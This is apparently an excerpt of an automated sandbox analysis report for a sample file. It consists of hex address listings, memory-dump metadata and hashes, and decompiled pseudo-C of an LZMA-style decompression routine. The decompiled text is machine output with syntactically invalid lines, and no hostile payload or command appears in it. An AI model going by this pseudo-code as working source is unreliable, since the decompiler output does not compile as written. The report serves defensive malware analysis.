                                              0x0040637c
                                              0x00406376
                                              0x00406376
                                              0x00406376
                                              0x0040636b
                                              0x0040636b
                                              0x0040636b
                                              0x00406380
                                              0x00406383
                                              0x004063a1
                                              0x004063a1
                                              0x004063a3
                                              0x00000000
                                              0x00406385
                                              0x00406385
                                              0x00406385
                                              0x00406388
                                              0x0040638b
                                              0x0040638e
                                              0x00406390
                                              0x00406390
                                              0x00406390
                                              0x00406393
                                              0x00406396
                                              0x00406398
                                              0x00406399
                                              0x0040639c
                                              0x00000000
                                              0x0040639c
                                              0x00000000
                                              0x004065d2
                                              0x004065d2
                                              0x004065d6
                                              0x004065f4
                                              0x004065f4
                                              0x004065f7
                                              0x004065fe
                                              0x00406601
                                              0x00406604
                                              0x00406607
                                              0x0040660a
                                              0x0040660d
                                              0x0040660f
                                              0x00406616
                                              0x00406617
                                              0x00406619
                                              0x0040661c
                                              0x0040661f
                                              0x00406622
                                              0x00406622
                                              0x00406627
                                              0x00000000
                                              0x00406627
                                              0x004065d8
                                              0x004065d8
                                              0x004065db
                                              0x004065de
                                              0x004065e8
                                              0x00000000
                                              0x00000000
                                              0x0040663c
                                              0x0040663c
                                              0x00406640
                                              0x00406663
                                              0x00406666
                                              0x00406669
                                              0x00406673
                                              0x00406642
                                              0x00406642
                                              0x00406645
                                              0x00406648
                                              0x0040664b
                                              0x00406658
                                              0x0040665b
                                              0x0040665b
                                              0x00000000
                                              0x00000000
                                              0x0040667f
                                              0x0040667f
                                              0x00406683
                                              0x00000000
                                              0x00000000
                                              0x00406689
                                              0x00406689
                                              0x0040668d
                                              0x00000000
                                              0x00000000
                                              0x00406693
                                              0x00406693
                                              0x00406695
                                              0x00406699
                                              0x00406699
                                              0x0040669c
                                              0x004066a0
                                              0x00000000
                                              0x00000000
                                              0x004066f0
                                              0x004066f0
                                              0x004066f4
                                              0x004066fb
                                              0x004066fb
                                              0x004066fe
                                              0x00406701
                                              0x0040670b
                                              0x00000000
                                              0x0040670b
                                              0x004066f6
                                              0x004066f6
                                              0x00000000
                                              0x00000000
                                              0x00406717
                                              0x00406717
                                              0x0040671b
                                              0x00406722
                                              0x00406725
                                              0x00406728
                                              0x0040671d
                                              0x0040671d
                                              0x0040671d
                                              0x0040672b
                                              0x0040672e
                                              0x00406731
                                              0x00406731
                                              0x00406734
                                              0x00406737
                                              0x0040673a
                                              0x0040673a
                                              0x0040673d
                                              0x00406744
                                              0x00406749
                                              0x00000000
                                              0x00000000
                                              0x004067d7
                                              0x004067d7
                                              0x004067db
                                              0x00406b79
                                              0x00406b79
                                              0x00000000
                                              0x00406b79
                                              0x004067e1
                                              0x004067e1
                                              0x004067e4
                                              0x004067e7
                                              0x004067eb
                                              0x004067ee
                                              0x004067f4
                                              0x004067f6
                                              0x004067f6
                                              0x004067f6
                                              0x004067f9
                                              0x004067fc
                                              0x00000000
                                              0x00000000
                                              0x004063cc
                                              0x004063cc
                                              0x004063d0
                                              0x00406b3d
                                              0x00406b3d
                                              0x00000000
                                              0x00406b3d
                                              0x004063d6
                                              0x004063d6
                                              0x004063d9
                                              0x004063dc
                                              0x004063e0
                                              0x004063e3
                                              0x004063e9
                                              0x004063eb
                                              0x004063eb
                                              0x004063eb
                                              0x004063ee
                                              0x004063f1
                                              0x004063f1
                                              0x004063f4
                                              0x004063f7
                                              0x00000000
                                              0x00000000
                                              0x004063fd
                                              0x004063fd
                                              0x00406403
                                              0x00000000
                                              0x00000000
                                              0x00406409
                                              0x00406409
                                              0x0040640d
                                              0x00406410
                                              0x00406413
                                              0x00406416
                                              0x00406419
                                              0x0040641a
                                              0x0040641d
                                              0x0040641f
                                              0x00406425
                                              0x00406428
                                              0x0040642b
                                              0x0040642e
                                              0x00406431
                                              0x00406434
                                              0x00406437
                                              0x00406453
                                              0x00406456
                                              0x00406459
                                              0x0040645c
                                              0x00406463
                                              0x00406467
                                              0x00406469
                                              0x0040646d
                                              0x00406439
                                              0x00406439
                                              0x0040643d
                                              0x00406445
                                              0x0040644a
                                              0x0040644c
                                              0x0040644e
                                              0x0040644e
                                              0x00406470
                                              0x00406477
                                              0x0040647a
                                              0x00000000
                                              0x00406480
                                              0x00406480
                                              0x00000000
                                              0x00406480
                                              0x00000000
                                              0x00406485
                                              0x00406485
                                              0x00406489
                                              0x00406b49
                                              0x00406b49
                                              0x00000000
                                              0x00406b49
                                              0x0040648f
                                              0x0040648f
                                              0x00406492
                                              0x00406495
                                              0x00406499
                                              0x0040649c
                                              0x004064a2
                                              0x004064a4
                                              0x004064a4
                                              0x004064a4
                                              0x004064a7
                                              0x004064aa
                                              0x004064aa
                                              0x004064aa
                                              0x004064b0
                                              0x00000000
                                              0x00000000
                                              0x004064b2
                                              0x004064b2
                                              0x004064b5
                                              0x004064b8
                                              0x004064bb
                                              0x004064be
                                              0x004064c1
                                              0x004064c4
                                              0x004064c7
                                              0x004064ca
                                              0x004064cd
                                              0x004064d0
                                              0x004064e8
                                              0x004064eb
                                              0x004064ee
                                              0x004064f1
                                              0x004064f1
                                              0x004064f4
                                              0x004064f8
                                              0x004064fa
                                              0x004064d2
                                              0x004064d2
                                              0x004064da
                                              0x004064df
                                              0x004064e1
                                              0x004064e3
                                              0x004064e3
                                              0x004064fd
                                              0x00406504
                                              0x00406507
                                              0x00000000
                                              0x00406509
                                              0x00406509
                                              0x00000000
                                              0x00406509
                                              0x00406507
                                              0x0040650e
                                              0x0040650e
                                              0x0040650e
                                              0x0040650e
                                              0x00000000
                                              0x00000000
                                              0x00406549
                                              0x00406549
                                              0x0040654d
                                              0x00406b55
                                              0x00406b55
                                              0x00000000
                                              0x00406b55
                                              0x00406553
                                              0x00406553
                                              0x00406556
                                              0x00406559
                                              0x0040655d
                                              0x00406560
                                              0x00406566
                                              0x00406568
                                              0x00406568
                                              0x00406568
                                              0x0040656b
                                              0x0040656e
                                              0x0040656e
                                              0x00406574
                                              0x00406512
                                              0x00406512
                                              0x00406515
                                              0x00000000
                                              0x00406515
                                              0x00406576
                                              0x00406576
                                              0x00406579
                                              0x0040657c
                                              0x0040657f
                                              0x00406582
                                              0x00406585
                                              0x00406588
                                              0x0040658b
                                              0x0040658e
                                              0x00406591
                                              0x00406594
                                              0x004065ac
                                              0x004065af
                                              0x004065b2
                                              0x004065b5
                                              0x004065b5
                                              0x004065b8
                                              0x004065bc
                                              0x004065be
                                              0x00406596
                                              0x00406596
                                              0x0040659e
                                              0x004065a3
                                              0x004065a5
                                              0x004065a7
                                              0x004065a7
                                              0x004065c1
                                              0x004065c8
                                              0x004065cb
                                              0x00000000
                                              0x004065cd
                                              0x004065cd
                                              0x00000000
                                              0x004065cd
                                              0x00000000
                                              0x0040685a
                                              0x0040685a
                                              0x0040685e
                                              0x00406b85
                                              0x00406b85
                                              0x00000000
                                              0x00406b85
                                              0x00406864
                                              0x00406864
                                              0x00406867
                                              0x0040686a
                                              0x0040686e
                                              0x00406871
                                              0x00406877
                                              0x00406879
                                              0x00406879
                                              0x00406879
                                              0x0040687c
                                              0x00000000
                                              0x00000000
                                              0x0040662a
                                              0x0040662a
                                              0x0040662d
                                              0x00000000
                                              0x00000000
                                              0x00406969
                                              0x00406969
                                              0x0040696d
                                              0x0040698f
                                              0x0040698f
                                              0x00406992
                                              0x0040699c
                                              0x0040699f
                                              0x0040699f
                                              0x00000000
                                              0x0040699f
                                              0x0040696f
                                              0x0040696f
                                              0x00406972
                                              0x00406976
                                              0x00406979
                                              0x00406979
                                              0x0040697c
                                              0x00000000
                                              0x00000000
                                              0x00406a26
                                              0x00406a26
                                              0x00406a2a
                                              0x00406a48
                                              0x00406a48
                                              0x00406a48
                                              0x00406a48
                                              0x00406a4f
                                              0x00406a56
                                              0x00406a5d
                                              0x00406a5d
                                              0x00406a64
                                              0x00406a67
                                              0x00406a6e
                                              0x00000000
                                              0x00406a71
                                              0x00406a2c
                                              0x00406a2c
                                              0x00406a2f
                                              0x00406a32
                                              0x00406a35
                                              0x00406a3c
                                              0x00406980
                                              0x00406980
                                              0x00406983
                                              0x00000000
                                              0x00000000
                                              0x00406b17
                                              0x00406b17
                                              0x00406b1a
                                              0x00406a1b
                                              0x00406a1b
                                              0x00406a1b
                                              0x00000000
                                              0x00406a21
                                              0x00000000
                                              0x00406751
                                              0x00406751
                                              0x00406753
                                              0x0040675a
                                              0x0040675b
                                              0x0040675d
                                              0x00406760
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00406a64
                                              0x00406a64
                                              0x00406a67
                                              0x00406a6e
                                              0x00000000
                                              0x00406a71
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00406796
                                              0x00406796
                                              0x00406799
                                              0x004067cf
                                              0x004067cf
                                              0x004068ff
                                              0x004068ff
                                              0x004068ff
                                              0x004068ff
                                              0x00406902
                                              0x00406902
                                              0x00406905
                                              0x00406907
                                              0x00406b91
                                              0x00406b91
                                              0x00000000
                                              0x00406b91
                                              0x0040690d
                                              0x0040690d
                                              0x00406910
                                              0x00000000
                                              0x00000000
                                              0x00406916
                                              0x00406916
                                              0x0040691a
                                              0x0040691d
                                              0x0040691d
                                              0x0040691d
                                              0x00000000
                                              0x0040691d
                                              0x0040679b
                                              0x0040679b
                                              0x0040679d
                                              0x0040679f
                                              0x004067a1
                                              0x004067a4
                                              0x004067a5
                                              0x004067a7
                                              0x004067a9
                                              0x004067ac
                                              0x004067af
                                              0x004067c5
                                              0x004067c5
                                              0x004067ca
                                              0x00406802
                                              0x00406802
                                              0x00406806
                                              0x0040682f
                                              0x00406832
                                              0x00406834
                                              0x0040683b
                                              0x0040683e
                                              0x00406841
                                              0x00406841
                                              0x00406846
                                              0x00406846
                                              0x00406848
                                              0x0040684b
                                              0x00406852
                                              0x00406855
                                              0x00406882
                                              0x00406882
                                              0x00406885
                                              0x00406888
                                              0x004068fc
                                              0x004068fc
                                              0x004068fc
                                              0x004068fc
                                              0x00000000
                                              0x004068fc
                                              0x0040688a
                                              0x0040688a
                                              0x00406890
                                              0x00406893
                                              0x00406896
                                              0x00406899
                                              0x0040689c
                                              0x0040689f
                                              0x004068a2
                                              0x004068a5
                                              0x004068a8
                                              0x004068ab
                                              0x004068c4
                                              0x004068c6
                                              0x004068c9
                                              0x004068ca
                                              0x004068cd
                                              0x004068cf
                                              0x004068d2
                                              0x004068d4
                                              0x004068d6
                                              0x004068d9
                                              0x004068db
                                              0x004068de
                                              0x004068e2
                                              0x004068e4
                                              0x004068e4
                                              0x004068e5
                                              0x004068e8
                                              0x004068eb
                                              0x004068ad
                                              0x004068ad
                                              0x004068b5
                                              0x004068ba
                                              0x004068bc
                                              0x004068bf
                                              0x004068bf
                                              0x004068ee
                                              0x004068f5
                                              0x0040687f
                                              0x0040687f
                                              0x0040687f
                                              0x0040687f
                                              0x00000000
                                              0x004068f7
                                              0x004068f7
                                              0x00000000
                                              0x004068f7
                                              0x004068f5
                                              0x00406808
                                              0x00406808
                                              0x0040680b
                                              0x0040680d
                                              0x00406810
                                              0x00406813
                                              0x00406816
                                              0x00406818
                                              0x0040681b
                                              0x0040681e
                                              0x0040681e
                                              0x00406821
                                              0x00406821
                                              0x00406824
                                              0x0040682b
                                              0x004067ff
                                              0x004067ff
                                              0x004067ff
                                              0x004067ff
                                              0x00000000
                                              0x0040682d
                                              0x0040682d
                                              0x00000000
                                              0x0040682d
                                              0x0040682b
                                              0x004067b1
                                              0x004067b1
                                              0x004067b4
                                              0x004067b6
                                              0x004067b9
                                              0x00000000
                                              0x00000000
                                              0x00406518
                                              0x00406518
                                              0x0040651c
                                              0x00406b61
                                              0x00406b61
                                              0x00000000
                                              0x00406b61
                                              0x00406522
                                              0x00406522
                                              0x00406525
                                              0x00406528
                                              0x0040652b
                                              0x0040652e
                                              0x00406531
                                              0x00406534
                                              0x00406536
                                              0x00406539
                                              0x0040653c
                                              0x0040653f
                                              0x00406541
                                              0x00406541
                                              0x00406541
                                              0x00000000
                                              0x00000000
                                              0x004066a3
                                              0x004066a3
                                              0x004066a7
                                              0x00406b6d
                                              0x00406b6d
                                              0x00000000
                                              0x00406b6d
                                              0x004066ad
                                              0x004066ad
                                              0x004066b0
                                              0x004066b3
                                              0x004066b6
                                              0x004066b8
                                              0x004066b8
                                              0x004066b8
                                              0x004066bb
                                              0x004066be
                                              0x004066c1
                                              0x004066c4
                                              0x004066c7
                                              0x004066ca
                                              0x004066cb
                                              0x004066cd
                                              0x004066cd
                                              0x004066cd
                                              0x004066d0
                                              0x004066d3
                                              0x004066d6
                                              0x004066d9
                                              0x004066d9
                                              0x004066d9
                                              0x004066dc
                                              0x004066de
                                              0x004066de
                                              0x00000000
                                              0x00000000
                                              0x00406920
                                              0x00406920
                                              0x00406920
                                              0x00406924
                                              0x00000000
                                              0x00000000
                                              0x0040692a
                                              0x0040692a
                                              0x0040692d
                                              0x00406930
                                              0x00406933
                                              0x00406935
                                              0x00406935
                                              0x00406935
                                              0x00406938
                                              0x0040693b
                                              0x0040693e
                                              0x00406941
                                              0x00406944
                                              0x00406947
                                              0x00406948
                                              0x0040694a
                                              0x0040694a
                                              0x0040694a
                                              0x0040694d
                                              0x00406950
                                              0x00406953
                                              0x00406956
                                              0x00406959
                                              0x0040695d
                                              0x0040695f
                                              0x00406962
                                              0x00000000
                                              0x00406964
                                              0x00406964
                                              0x004066e1
                                              0x004066e1
                                              0x00000000
                                              0x004066e1
                                              0x00406962
                                              0x00406b97
                                              0x00406b97
                                              0x00000000
                                              0x00000000
                                              0x004061c6
                                              0x00406bce
                                              0x00406bce
                                              0x00000000
                                              0x00406bce
                                              0x00406a1b
                                              0x00406a9b
                                              0x00406a64

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.302029421.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.302004824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302049001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302057343.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302063724.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302177827.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302199848.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302210667.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_qHpeBvr9cR.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9f777e2b5f047ff5fac18a6b7d4eccb0398312e185884248bc8ff9efca1ede3f
                                              • Instruction ID: 0a364959098a1219693739684ad0890dad76377db1f96b1360ce1028e8ac0eba
                                              • Opcode Fuzzy Hash: 9f777e2b5f047ff5fac18a6b7d4eccb0398312e185884248bc8ff9efca1ede3f
                                              • Instruction Fuzzy Hash: 7EA15371E00229CBDF28DFA8C8447ADBBB1FB45305F11816ED816BB281C7786A96DF44
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00406969 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 98%
                                              			E00406969() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00406BD6))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
